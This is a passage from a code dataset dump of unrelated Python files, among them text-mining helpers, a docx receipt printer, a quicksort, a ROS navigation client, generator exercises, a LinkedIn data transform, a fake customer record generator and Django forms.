docs.data:\n temp_d = \" \".join(d.split(\"\\n\")).strip('\\n\\t')\n D.append([temp_d])\n return D\n\ndef format_labels(target, docs):\n \"\"\" format the labels \"\"\"\n return docs.target_names[target]\n\ndef check_missing_values(row):\n \"\"\" functions that check and verifies if there are missing values in dataframe \"\"\"\n counter = 0\n for element in row:\n if element == True:\n counter+=1\n return (\"The amoung of missing records is: \", counter)\n\ndef tokenize_text(text, remove_stopwords=False):\n \"\"\"\n Tokenize text using the nltk library\n \"\"\"\n tokens = []\n for d in nltk.sent_tokenize(text, language='english'):\n for word in nltk.word_tokenize(d, language='english'):\n # filters here\n tokens.append(word)\n return tokens\n#-------------------------------------------------------------Mine---------------------\ndef sentence_preprocessing(Analyzer, Sentences):\n corpus = []\n for s in list(Sentences):\n tokens = Analyzer(s)\n string = ' '\n corpus.append(string.join(tokens))\n return corpus\n\nclass DatasetGenerator:\n\n def __init__(self):\n \n self.sentences = []\n self.labels = []\n \n def add_data(self, PATH):\n \n input_file = open(PATH, 'r', encoding=\"utf-8\")\n\n for line in input_file:\n line = line.strip()\n ss = line.split('\\t')\n self.sentences.append(ss[0])\n self.labels.append(ss[1])\n \n def get_pandas_dataframe(self):\n \n Combined = [self.sentences, self.labels]\n Combined = np.array(Combined).T\n \n df = pd.DataFrame(Combined, columns=['Sentences', 'Labels'])\n \n return df\n","sub_path":"helpers/data_mining_helpers.py","file_name":"data_mining_helpers.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"293178094","text":"import os\r\nimport sys\r\nfrom docx import Document\r\nfrom docx.shared import Inches\r\nimport pyqrcode\r\n#from docx.enum.style import WD_STYLE_TYPE\r\n\r\ndir = os.path.dirname(__file__)\r\n\r\n\r\n\r\nclass NewReceipt(object):\r\n def __init__(self):\r\n\r\n #loads template file\r\n \r\n## print dir\r\n## print path\r\n self.document = Document(os.path.join(dir,'receiptTemplate.docx'))\r\n\r\n \r\n # sets default reciept settings\r\n self.details = {\r\n 'recipeName':'no name',\r\n 'recipeDescription':'no description',\r\n 'recipeURL':'no url',\r\n 'recipeCode':'no code',\r\n 'nestleProduct':'no product',\r\n 'servingSize':'no serving size',\r\n 'ingredients':[],\r\n 'aisles':[],\r\n 'aisleNames':[],\r\n 'aisleIDs':[]\r\n }\r\n \r\n def check(self):\r\n if len(self.details['ingredients']) != len(self.details['aisles']):\r\n raise ValueError('ingredients and aisles should be the same length')\r\n \r\n \r\n\r\n \r\n def updateDoc(self):\r\n \r\n # update simple text\r\n for key in self.details:\r\n placeholder = ':'+key+':'\r\n #print placeholder\r\n\r\n for p in self.document.paragraphs:\r\n if not placeholder in p.text:\r\n continue\r\n else:\r\n## print key\r\n## print '---------',self.details[key]\r\n p.text = p.text.replace(placeholder,self.details[key])\r\n\r\n # Update servings icons\r\n\r\n\r\n for p in self.document.paragraphs:\r\n if not ':servingIcons:' in p.text:\r\n continue\r\n\r\n## p.text = p.text.replace(':servingIcons:',str(ss))\r\n \r\n ss = self.details['servingSize']\r\n## print ss\r\n if ss>4:\r\n p.text = p.text.replace(':servingIcons:',ss)\r\n \r\n## p.text = p.text.replace(':servingIcons:',str(ss)+' x ')\r\n## r = p.add_run()\r\n## r.add_picture('person.png',width=Inches(.15))\r\n \r\n \r\n else:\r\n p.text = p.text.replace(':servingIcons:','')\r\n r = p.add_run()\r\n person = os.path.join(dir, 'person.png')\r\n for i in range(0,ss):\r\n r.add_picture(person,width=Inches(.15)) \r\n \r\n break\r\n \r\n\r\n # create shopping list\r\n # find where to place it\r\n for p in self.document.paragraphs:\r\n if not ':shoppingList:' in p.text:\r\n continue\r\n \r\n p.text = p.text.replace(':shoppingList:','')\r\n break\r\n\r\n\r\n\r\n # loop through the aisles\r\n \r\n for i in range(0,len(self.details['aisleIDs'])):\r\n aisleID = self.details['aisleIDs'][i]\r\n aisleName = self.details['aisleNames'][i]\r\n p.insert_paragraph_before(aisleName,style='Heading 1')\r\n\r\n for j in range(0,len(self.details['aisles'])):\r\n aisle = self.details['aisles'][j]\r\n ingredient = self.details['ingredients'][j]\r\n if not aisle == aisleID:\r\n continue\r\n p.insert_paragraph_before(ingredient,style='List Paragraph')\r\n \r\n # Insert QR code\r\n qr_path = os.path.join(dir, 'qr.png')\r\n \r\n qr = pyqrcode.create(self.details['recipeURL'],error='M')\r\n qr.png(qr_path,scale=5)\r\n\r\n for p in self.document.paragraphs:\r\n if not ':QR:' in p.text:\r\n continue\r\n \r\n p.text = p.text.replace(':QR:','')\r\n break\r\n r = p.add_run()\r\n \r\n r.add_picture(qr_path,width=Inches(1.5))\r\n\r\n \r\n def send2printer(self):\r\n # make sure the file is ready to print\r\n self.check()\r\n self.updateDoc()\r\n\r\n # delete old recipe and save new one\r\n## path = os.path.dirname(sys.argv[0])\r\n## tmp = path+'/temp.docx';\r\n tmp = os.path.join(dir, 'temp.docx')\r\n if os.path.isfile(tmp): \r\n os.remove(tmp)\r\n self.document.save(tmp)\r\n\r\n os.startfile(tmp, \"print\")\r\n #os.startfile(tmp)#savePaper\r\n\r\n\r\n def send2file(self):\r\n # make sure the file is ready to print\r\n self.check()\r\n self.updateDoc()\r\n\r\n # delete old recipe and save new one\r\n## path = os.path.dirname(sys.argv[0])\r\n## tmp = path+'/temp.docx';\r\n tmp = os.path.join(dir, self.details['ID']+'.docx')\r\n if os.path.isfile(tmp): \r\n os.remove(tmp)\r\n self.document.save(tmp)\r\n\r\n\r\n \r\n\r\n\r\n\r\n#######\r\n","sub_path":"lib/printerToolbox.py","file_name":"printerToolbox.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"4612073","text":"import noiseInverse\nimport mapPCG\n\nclass mapNoiseFilter( mapPCG.pcgFilter ):\n def __init__( self, m, p2dNoise ):\n self.m = m\n self.p2d = p2dNoise\n def applyFilter( self ):\n filtMap0 = noiseInverse.nInverseMap(self.m,self.p2d,kMask=self.p2d.kMask,showNInverse=False, \\\n noiseFloorAsPercOfMax = 2.0)\n self.m.data[:] = filtMap0.data[:]\n\n","sub_path":"flipper/mapPCGFilter.py","file_name":"mapPCGFilter.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"529074466","text":"# quicksort.py by Aidan Nelson, February 15, 2012.\n# a quicksorting algorithm. \n\n# a function to swap two items in a list:\ndef swap_items(the_list, a, b): \n temp = the_list[a]\n the_list[a] = the_list[b]\n the_list[b] = temp\n\n# a partitioning function to be used in quicksort:\ndef partition(the_list, p, r, compare_function):\n # set position of indices for less-than-or-equal and greater-than the pivot point.\n i = p - 1\n j = p\n # set value for pivot:\n pivot = the_list[r]\n \n while j != r:\n # if the value at index j is less than or equal to the value of pivot, \n # swap that value into the less-than-pivot section at the_list[:i+1]\n if compare_function(the_list[j], pivot):\n i += 1\n swap_items(the_list, i, j)\n # keep index j moving towards the pivot point\n j += 1\n # move the pivot point item to the pivot point between sections of the list\n # less-than-or-equal and greater-than itself\n swap_items(the_list, i + 1, r)\n \n #return the index of the pivot point\n return i + 1\n \n \n# quicksort funciton:\ndef quicksort(the_list, p, r, compare_function):\n # if we have a list of more than one item, continue to quick sort:\n if not len(the_list[p:r + 1]) < 2:\n \n # partition the list and set value of pivot index to q\n q = partition(the_list, p, r, compare_function)\n \n # recursively quick sort each section (below pivot and above pivot)\n quicksort(the_list, p, q - 1, compare_function)\n quicksort(the_list, q + 1, r, compare_function)\n \n\n","sub_path":"elevation_mapping/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"104558900","text":"import sys\nimport heapq\n\nnumbers = int(input())\nheap = []\n\n# Max heap\n# heappop() 함수가 가장 작은 값을 리턴하기 떄문에\n# 가장 작은 값에 -1을 곱해서\n# 가장 큰 수로 만들어서 출력\n\nfor _ in range(numbers):\n num = int(sys.stdin.readline())\n if num != 0:\n heapq.heappush(heap, (-num))\n else:\n try:\n print(-1 * heapq.heappop(heap))\n except:\n print(0)\n\n","sub_path":"BaekJoon/최대_힙.py","file_name":"최대_힙.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"535454006","text":"#! /usr/bin/env python\n\n# uses the move base actionlib service\n# call this client to go home\n\nfrom __future__ import print_function\n\nimport rospy\n# Brings in the SimpleActionClient\nimport actionlib\n# Brings in the messages used by the fibonacci action, including the\n# goal message and the result message.\nimport magni_2dnav.msg\nfrom move_base_msgs.msg import MoveBaseAction, MoveBaseGoal\n\ndef go_home_client():\n # Creates the SimpleActionClient, passing the type of the action\n # (FibonacciAction) to the constructor.\n #client = actionlib.SimpleActionClient('go_home', actionlib_tutorials.msg.GoHomeAction)\n client = actionlib.SimpleActionClient('move_base',MoveBaseAction)\n\n # Waits until the action server has started up and started\n # listening for goals.\n print('wating for server to be started')\n client.wait_for_server()\n print('creating goal')\n # Creates a goal to send to the action server.\n goal = MoveBaseGoal()\n goal.target_pose.header.frame_id = \"map\"\n goal.target_pose.header.stamp = rospy.Time.now()\n goal.target_pose.pose.position.x = 7.331\n goal.target_pose.pose.position.y = -0.694\n goal.target_pose.pose.position.z = 0.0\n goal.target_pose.pose.orientation.x = 0.0\n goal.target_pose.pose.orientation.y = 0.0\n goal.target_pose.pose.orientation.z = 0.549\n goal.target_pose.pose.orientation.w = 0.836\n print('sending goal')\n\n client.send_goal(goal)\n wait = client.wait_for_result()\n if not wait:\n rospy.logerr(\"Action server not available!\")\n rospy.signal_shutdown(\"Action server not available!\")\n else:\n return client.get_result()\n\nif __name__ == '__main__':\n try:\n # Initializes a rospy node so that the SimpleActionClient can\n # publish and subscribe over ROS.\n rospy.init_node('go_home_client_py')\n result = go_home_client()\n if result:\n rospy.loginfo('We went home!')\n except rospy.ROSInterruptException:\n rospy.loginfo(\"program interrupted before completion\")\n","sub_path":"magni_2dnav/scripts/clients/go_home_client.py","file_name":"go_home_client.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"82772438","text":"from utils import add_trademark, process_text, modify_text\n\nLOCAL_HOST, LISTEN_PORT = '127.0.0.1', 9000\nTARGET_HOST = 'https://habrahabr.ru'\n\n\ndef test_add_trademark():\n word, tm = \"foo\", \"\\u2122\"\n assert add_trademark(word) == f\"{word}{tm}\"\n\n\ndef test_process_text():\n tm = \"\\u2122\"\n text = \"У Google новые смартфоны, наушники, камера\"\n result = f\"У Google{tm} новые смартфоны, наушники, камера{tm}\"\n assert isinstance(process_text(text), str)\n assert process_text(text) == result\n\n\ndef test_modify_text():\n url = \"https://habrahabr.ru\"\n assert isinstance(modify_text(url), bytes)\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"124728742","text":"\"\"\"Try to replicate my bash environment\"\"\"\n\n\nfrom pysyte.paths import environ_path\n\n\ndef _environ_dir(name):\n \"\"\"Find the path in environment and convert to a Path\n\n or None if nnot found\n\n >>> _environ_dir('HOME').isdir()\n True\n \"\"\"\n try:\n result = environ_path(name)\n except KeyError:\n return None\n if not (result.isdir() or result.isfile()):\n return None\n return result\n\n\ndef _load_environment_paths():\n \"\"\"Look for expected paths in environment\n\n Put them in module globals\n \"\"\"\n jab_paths = [\n 'HOME', 'PYTHON']\n for _ in jab_paths:\n globals()[_] = _environ_dir(_)\n\ntry:\n _ = HOME # pylint: disable=undefined-variable\nexcept NameError:\n _load_environment_paths()\n","sub_path":"src/python/pyjab/jab/environ.py","file_name":"environ.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"84972476","text":"import sys\nsys.path.append('..')\nfrom SVG import SVG\n\n\nw = 300\nh = 300\n\n\ns = SVG(w,h)\n\ns.line(w/2,0,w/2,h)\ns.line(0,h/2,w,h/2)\n\nfor x in range(-10,10):\n # upper\n s.line((x+10)*w/20, h/2, w/2, abs(x)*h/20)\n # lower\n s.line((x+10)*w/20, h/2, w/2, -(abs(x)-10)*h/20+h/2)\n","sub_path":"01/b-svg.py","file_name":"b-svg.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"75735579","text":"\"\"\"\n 给定一个链表,两两交换其中相邻的节点,并返回交换后的链表。\n 你不能只是单纯的改变节点内部的值,而是需要实际的进行节点交换。\n\n 示例:\n 给定 1->2->3->4, 你应该返回 2->1->4->3.\n\"\"\"\n\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def swapPairs(self, head: ListNode) -> ListNode:\n return self.loop(head)\n\n @classmethod\n def recursive(cls, head: ListNode) -> ListNode:\n \"\"\"\n 递归更新每两个点的链表形态。\n 时间复杂度:O(N),N 指的是链表的节点数量。\n 空间复杂度:O(N),递归过程使用的堆栈空间。\n \"\"\"\n if not (head and head.next):\n return head\n\n next_node = head.next\n head.next = cls.recursive(head.next.next)\n next_node.next = head\n return next_node\n\n @classmethod\n def loop(cls, head: ListNode) -> ListNode:\n \"\"\"\n 循环遍历\n 单独设置一个前驱节点,方便\n 时间复杂度是O(n),空间复杂度是O(1)\n \"\"\"\n root = ListNode(-1)\n root.next = head\n\n prev = root\n\n while head and head.next:\n first_node = head\n second_node = head.next\n\n prev.next = second_node\n first_node.next = second_node.next\n second_node.next = first_node\n\n head = first_node.next\n prev = first_node\n\n return root.next\n","sub_path":"Week_01/G20200343030545/LeetCode_24_545.py","file_name":"LeetCode_24_545.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"594994156","text":"from distutils.util import strtobool\n\nfrom settings import EXP_TYPES_PATH\n\n__author__ = 'Ahmed G. Ali'\n\n\ndef is_microarray(exp_type):\n if not exp_type:\n return True\n f = open(EXP_TYPES_PATH, 'r')\n lines = f.readlines()\n f.close()\n types = {}\n for line in lines:\n tmp = line.strip().split('\\t')\n types[tmp[0].lower()] = [tmp[1], tmp[2]]\n if exp_type.lower() in types.keys():\n return strtobool(types[exp_type.lower()][0])\n return True\n\n\nif __name__ == '__main__':\n t = is_microarray('transcription profiling by high throughput sequencing')\n print(t)\n","sub_path":"checkers.py","file_name":"checkers.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"515150584","text":"import xlwt\r\nimport os\r\n\r\nfrom optparse import OptionParser\r\nimport subprocess\r\nimport sys\r\nimport difflib\r\nimport xlsxwriter\r\nimport re\r\nimport math\r\npath=\"D:\\\\Duke\\\\Duke_201904\\\\Resfinder_0.8_0.6_20190426\"\r\npath3=\"D:\\\\Duke\\\\Duke_201904\"\r\n\r\ndef getwork():\r\n files=os.listdir(path)\r\n wb=xlsxwriter.Workbook((path3+\"\\\\\"+'Resfinder_results20190426_640.xlsx'))\r\n ws1 = wb.add_worksheet('Resfinder')\r\n dic_tmp={}\r\n dic_ID={}\r\n results=[]\r\n idlist={}\r\n nb=1\r\n ws1.write (0,0,'ID')\r\n listres=[\"Sulphonamide\",\"MLS - Macrolide, Lincosamide and Streptogramin B\",\"Fusidic Acid\",\"Nitroimidazole\",\"Aminoglycoside\",\"Oxazolidinone\",\"Beta-lactam\",\"Fosfomycin\",\"Rifampicin\",\"Colistin\",\"Tetracycline\",\"Glycopeptide\",\"Phenicol\",\"Trimethoprim\",\"Fluoroquinolone\"]\r\n for g in listres:\r\n dic_ID[g]=nb\r\n ws1.write(0,nb,g)\r\n nb = nb+1\r\n for i in range(len(files)):\r\n workfile = path+\"\\\\\"+files[i]\r\n file=files[i]\r\n file_name=file.split('.')\r\n file_ID=file_name[0].split('_')\r\n i += 1\r\n ws1.write(i,0,str(file_ID[0]))\r\n idlist[file_ID[0]]=i\r\n infile = open(workfile, \"r\").readlines()\r\n number=0\r\n for gl in listres:\r\n dic_tmp[gl]=[]\r\n for m in range(0,len(infile)):\r\n line1=infile[m].strip()\r\n if line1.startswith('Resistance'):\r\n naline=infile[m-1].strip()\r\n if naline==gl:\r\n while not infile[m+1].startswith('\\n'):\r\n idco=infile[m+1].split(\"\\t\")\r\n m += 1\r\n identity=idco[1]\r\n coverage=idco[3]\r\n genelength=idco[2].split(\"/\")[1]\r\n results=[str(idco[0]),str(identity),str(coverage),str(genelength),'|']\r\n dic_tmp[gl].extend(results)\r\n #print(file_ID[0],gl,dic_tmp[gl],\"!!!\",m,idco)\r\n results=[]\r\n \r\n for ider in dic_tmp.keys():\r\n tmp=(' ').join(dic_tmp[ider])\r\n ws1.write(i,dic_ID[ider],tmp)\r\n wb.close()\r\n \r\nif __name__=='__main__':\r\n getwork()\r\n","sub_path":"sequenceAnalysisCode/resfinderwork20190425.py","file_name":"resfinderwork20190425.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"502175086","text":"import urllib.request\nimport json\nimport dml\nimport prov.model\nimport datetime\nimport uuid\n\n\nclass transformLinkedin(dml.Algorithm):\n contributor = 'emmaliu_yuyangl'\n reads = ['emmaliu_gaotian_xli33_yuyangl.linkedin']\n writes = ['emmaliu_gaotian_xli33_yuyangl.userLocation']\n\n @staticmethod\n def execute(trial=False):\n '''Retrieve some data sets (not using the API here for the sake of simplicity).'''\n startTime = datetime.datetime.now()\n\n # Set up the database connection.\n client = dml.pymongo.MongoClient()\n repo = client.repo\n repo.authenticate('emmaliu_gaotian_xli33_yuyangl', 'emmaliu_gaotian_xli33_yuyangl')\n \n \n # Get linkedin data \n linkedinData = repo.emmaliu_gaotian_xli33_yuyangl.linkedin.find()\n jobs = {}\n data=[]\n dataStored=[]\n countchange=0\n \n for data in linkedinData:\n if data['query'] == \"amman\":\n name = data['name']\n location = data['query']\n job = data['job']\n #print(job)\n currentJob = data['currentJob']\n #print(currentJob)\n if currentJob == '':\n jobchange = False\n # print(jobchange)\n # jobs[name] = jobchange\n\n if jobchange == False:\n jobs[name] = {'job':job,'currentjob':currentJob,'location':location,'changejob':'yes'}\n if jobchange != False:\n jobs[name] = {'job':job,'currentjob':currentJob,'location':location,'changejob':'no'}\n \n if jobs[name]['changejob'] == 'yes':\n countchange+=1\n\n \n for key,value in jobs.items():\n # print(key)\n dataStored.append({'name':key,'job':value['job'],'currentjob':value['currentjob']})\n\n\n # store results into database\n repo.dropCollection(\"transLinkedin\")\n repo.createCollection(\"transLinkedin\")\n\n for i in dataStored:\n # print(i)\n repo['emmaliu_gaotian_xli33_yuyangl.userLocation'].insert(i)\n repo['emmaliu_gaotian_xli33_yuyangl.userLocation'].metadata({'complete': True})\n print(repo['emmaliu_gaotian_xli33_yuyangl.userLocation'].metadata())\n\n repo.logout()\n\n endTime = datetime.datetime.now()\n\n return {\"start\": startTime, \"end\": endTime}\n\n @staticmethod\n def provenance(doc=prov.model.ProvDocument(), startTime=None, endTime=None):\n '''\n Create the provenance document describing everything happening\n in this script. Each run of the script will generate a new\n document describing that invocation event.\n '''\n\n\n # Set up the database connection.\n client = dml.pymongo.MongoClient()\n repo = client.repo\n\n repo.authenticate('emmaliu_gaotian_xli33_yuyangl', 'emmaliu_gaotian_xli33_yuyangl')\n doc.add_namespace('alg', 'http://datamechanics.io/algorithm/emmaliu_gaotian_xli33_yuyangl') # The scripts are in # format.\n doc.add_namespace('dat', 'http://datamechanics.io/data/emmaliu_gaotian_xli33_yuyangl') # The data sets are in # format.\n doc.add_namespace('ont', 'http://datamechanics.io/ontology#') # 'Extension', 'DataResource', 'DataSet', 'Retrieval', 'Query', or 'Computation'.\n doc.add_namespace('log', 'http://datamechanics.io/log/') # The event log.\n doc.add_namespace('bdp', '')\n\n\n this_script = doc.agent('alg:emmaliu_gaotian_xli33_yuyangl#transformLinkedin',\n {prov.model.PROV_TYPE: prov.model.PROV['SoftwareAgent'], 'ont:Extension': 'py'})\n resource = doc.entity('bdp:linkedinapi',\n {'prov:label': '311, Service Requests', prov.model.PROV_TYPE: 'ont:DataResource',\n 'ont:Extension': 'json'})\n\n transform_Linkedin = doc.activity('log:uuid' + str(uuid.uuid4()), startTime, endTime)\n doc.wasAssociatedWith(transform_Linkedin, this_script)\n doc.usage(transform_Linkedin, resource, startTime, None,\n {prov.model.PROV_TYPE: 'ont:Retrieval',\n 'ont:Query': '?type=Animal+Found&$select=type,latitude,longitude,OPEN_DT'\n }\n )\n\n\n Linkedin = doc.entity('dat:emmaliu_gaotian_xli33_yuyangl#get_linkedin',\n {prov.model.PROV_LABEL: 'linkedin', prov.model.PROV_TYPE: 'ont:DataSet'})\n doc.wasAttributedTo(Linkedin, this_script)\n doc.wasGeneratedBy(Linkedin, transform_Linkedin, endTime)\n doc.wasDerivedFrom(Linkedin, resource, transform_Linkedin, transform_Linkedin, transform_Linkedin)\n\n repo.logout()\n\n return doc\n\n# transformLinkedin.execute()\n# doc = getTweets.provenance()\n# print(doc.get_provn())\n","sub_path":"emmaliu_gaotian_xli33_yuyangl/transformLinkedin.py","file_name":"transformLinkedin.py","file_ext":"py","file_size_in_byte":4915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"149751728","text":"from utils.getter import gen_couchdb_id\nfrom random import randint, choice\nfrom datetime import datetime, timedelta\nimport string\nfrom functools import reduce\n\n__male_names = [\"Александр\", \"Алексей\", \"Андрей\",\n \"Антон\", \"Артём\", \"Афанасий\",\n \"Борис\", \"Владимир\", \"Георгий\",\n \"Григорий\", \"Даниил\", \"Денис\",\n \"Евгений\", \"Кирилл\", \"Константин\",\n \"Михаил\", \"Николай\", \"Олег\",\n \"Петр\", \"Радеон\", \"Руслан\",\n \"Степан\", \"Тимофей\", \"Федор\"]\n\n__female_names = [\"Александра\", \"Алла\", \"Анна\",\n \"Анастасия\", \"Валентина\", \"Валерия\",\n \"Виктория\", \"Галина\", \"Диана\",\n \"Евгения\", \"Екатерина\", \"Елена\",\n \"Жанна\", \"Зинаида\", \"Зоя\",\n \"Инна\", \"Ирина\", \"Ксения\",\n \"Людмила\", \"Мария\", \"Надежда\",\n \"Наталия\", \"Ольга\", \"Светлана\",\n \"Юлия\", \"Яна\"]\n\n__surnames = ['Архипов', 'Афанасьев', 'Баранов', 'Белов', 'Белозёров',\n 'Блинов', 'Блохин', 'Бобров', 'Бобылёв', 'Богданов',\n 'Власов', 'Волков', 'Воробьёв', 'Воронов', 'Воронцов',\n 'Громов', 'Гуляев', 'Гурьев', 'Гусев', 'Гущин',\n 'Доронин', 'Дорофеев', 'Дроздов', 'Дьячков', 'Евдокимов',\n 'Ершов', 'Ефимов', 'Ефремов', 'Жданов', 'Жуков',\n 'Казаков', 'Калашников', 'Калинин', 'Капустин', 'Карпов',\n 'Кузьмин', 'Кулагин', 'Кулаков', 'Куликов', 'Лаврентьев',\n 'Лобанов', 'Логинов', 'Лукин', 'Лыткин', 'Макаров',\n 'Морозов', 'Муравьёв', 'Мухин', 'Мышкин', 'Мясников',\n 'Никифоров', 'Николаев', 'Никонов', 'Новиков', 'Носков',\n 'Носов', 'Овчинников', 'Одинцов', 'Орехов', 'Орлов',\n 'Осипов', 'Павлов', 'Панов', 'Панфилов', 'Пахомов',\n 'Попов', 'Потапов', 'Прохоров', 'Рогов', 'Родионов',\n 'Рожков', 'Романов', 'Русаков', 'Рыбаков', 'Рябов',\n 'Сафонов', 'Селезнёв', 'Селиверстов', 'Семёнов', 'Сергеев',\n 'Сидоров', 'Силин', 'Симонов', 'Ситников', 'Соболев',\n 'Терентьев', 'Тетерин', 'Тимофеев', 'Титов', 'Тихонов',\n 'Филиппов', 'Фокин', 'Фомин', 'Фомичёв', 'Фролов',\n 'Харитонов', 'Хохлов', 'Цветков', 'Чернов', 'Шарапов',\n 'Шубин', 'Щербаков', 'Щукин', 'Юдин', 'Яковлев', 'Якушев']\n\n\ndef set_last_name(name, sex):\n if sex:\n sex = 'ич'\n else:\n sex = 'на'\n\n if name[-2:] == 'ей':\n last_name = name[:-1] + 'ев' + sex\n elif name[-2:] == 'ий':\n last_name = name[:-2] + 'ьев' + sex\n else:\n last_name = name + 'ов' + sex\n\n return last_name\n\n\ndef random_date(start, end):\n return start + timedelta(\n seconds=randint(0, int((end - start).total_seconds())))\n\n\ndef generate_customer_put():\n sex = bool(randint(0, 1))\n if sex:\n # male\n name = choice(__male_names)\n surname = choice(__surnames)\n last_name = set_last_name(choice(__male_names), sex)\n sex = 'male'\n else:\n # female\n name = choice(__female_names)\n surname = choice(__surnames) + 'а'\n last_name = set_last_name(choice(__male_names), sex)\n sex = 'female'\n\n date = random_date(datetime(year=1960, month=1, day=1), datetime(year=2000, month=12, day=31))\n date = datetime.strftime(date, \"%Y-%m-%dT%H:%M:%SZ\")\n\n contact_methods = [{\n 'type': \"phoneNumber\",\n 'value': reduce(lambda a, b: a + choice(string.digits), string.digits, \"\")\n }]\n\n tokens = [{\n 'key': str(randint(1000, 9999)),\n 'type': \"card\",\n 'entry': \"trackCode\"\n }]\n\n customer_id = gen_couchdb_id('customer_put')\n\n customer_put = {\n '_id': customer_id,\n 'purged': True,\n # Используется для фильтрации, но в тестах пока не используется\n # 'tablesSchemeDocId': table_scheme,\n 'customerGuid': customer_id,\n 'firstName': name,\n 'middleName': last_name,\n 'lastName': surname,\n 'sex': sex,\n 'dateOfBirth': date,\n 'contactMethods': contact_methods,\n 'comment': \"Типичный клиентик. (Данный комментарий можно заменить на случайно сгенерированное сообщение)\",\n 'tokens': tokens\n }\n\n return customer_put\n","sub_path":"utils/generate/generate_customer.py","file_name":"generate_customer.py","file_ext":"py","file_size_in_byte":5498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"438296047","text":"# DAY THREE HANDS ON ASSIGNMENT\n\n'''\n 1. Create fib series using generators\n'''\n\ndef fib(n):\n a, b, count = 0, 1, 0\n while True:\n if count > n:\n return\n yield a\n a, b = b, a + b\n count += 1\n\nf = fib(10)\nfor x in f:\n print(list(f))\n\n\n\n'''\n 2. Display prime numbers from n1 to n2 using iterators and generators\n'''\n\nclass Primos:\n\n def __init__(self, n1, n2):\n self.n1 = n1\n self.n2 = n2\n\n def __iter__(self):\n return self\n\n def __next__(self):\n val = self.n1\n\n if self.n1 > self.n2:\n raise StopIteration\n\n self.n1 += 1\n\n for x in range(2, val):\n if val % x == 0:\n break\n else:\n return val\n\np = Primos(1, 10)\n\nlist_primes= [v for v in p if v is not None]\nprint(list_primes)\n\n\n\n'''Generator method to get prime numbers from 30 to 200'''\n\ndef is_prime(n):\n for i in range(2, int((n ** 0.5)) + 1):\n if n % i == 0:\n return False\n return True\n\ndef getPrimes(n1, n2):\n while n1 < n2:\n if is_prime(n1):\n yield n1\n n1 += 1\n\nl = list(getPrimes(30, 200))\n\nprint(l)\n\n\n\n'''\n 3. Write a generator which computes the running average for any given list\n input = [7, 13, 17, 231, 12, 8, 3]\n output = [7.00, 10.00, 12.33, 67.00, 56.00, 48.00, 41.57]\n'''\n\ndef compute_running_avg():\n total, count, avg = 0.0, 0, None\n\n while True:\n temp = yield avg\n total += temp\n count += 1\n avg = total / count\n\n\nrunning_avg = compute_running_avg()\nnext(running_avg)\na_list = [7, 13, 17, 231, 12, 8, 3]\n\nfor v in a_list:\n result = \"sent: {val:3d}, new average: {avg:6.2f}\"\n print(result.format(val=v, avg=running_avg.send(v)))\n\n","sub_path":"exo7.py","file_name":"exo7.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"264423265","text":"from django import forms\nfrom django.core.exceptions import ValidationError\n\nfrom .models import Tag, Post\n\n\nclass TagForm(forms.ModelForm): #(forms.Form):\n #title = forms.CharField(max_length=50)\n #slug = forms.CharField(max_length=150)\n\n #title.widget.attrs.update({ 'class': 'form-control' })\n #slug.widget.attrs.update({ 'class': 'form-control' })\n class Meta:\n model = Tag\n fields = ['title','slug']\n\n widgets = {\n 'title': forms.TextInput(attrs={'class': 'form-control'}),\n 'slug': forms.TextInput(attrs={'class': 'form-control'})\n }\n\n\n\n def clean_slug(self):\n new_slug = self.cleaned_data['slug'].lower() # self.cleaned_data.get('slug')\n #фильтрация слов которые нельза импортировать в бд - систнемные слова\n #например слово пути маршрута 'create'\n if new_slug == 'create':\n raise ValidationError('Slug may not be \"Create\"')\n #проверим слаг на наличие в словаре хранимых слов зарегистрированных\n #если count > 0 то возвращается true если count == 0 то false\n if Tag.objects.filter(slug__iexact=new_slug).count():\n raise ValidationError('Slug must be unique. We have \"{}\" slug already'.format(new_slug))\n\n return new_slug\n\n\n #переопределим метод save()\n #при наследовании от forms.ModelForm этот метод нельзя переопределить,\n #так как у него есть свой универсальный метод save()\n #def save(self):\n # new_tag=Tag.objects.create(title=self.cleaned_data['title'],\n # slug=self.cleaned_data['slug']\n # )\n # return new_tag\n\n\nclass PostForm(forms.ModelForm):\n class Meta:\n model = Post\n\n fields = ['title','slug', 'body', 'tags']\n\n widgets = {\n 'title': forms.TextInput(attrs={'class': 'form-control'}),\n 'slug': forms.TextInput(attrs={'class': 'form-control'}),\n 'body': forms.Textarea(attrs={'class': 'form-control'}),\n 'tags': 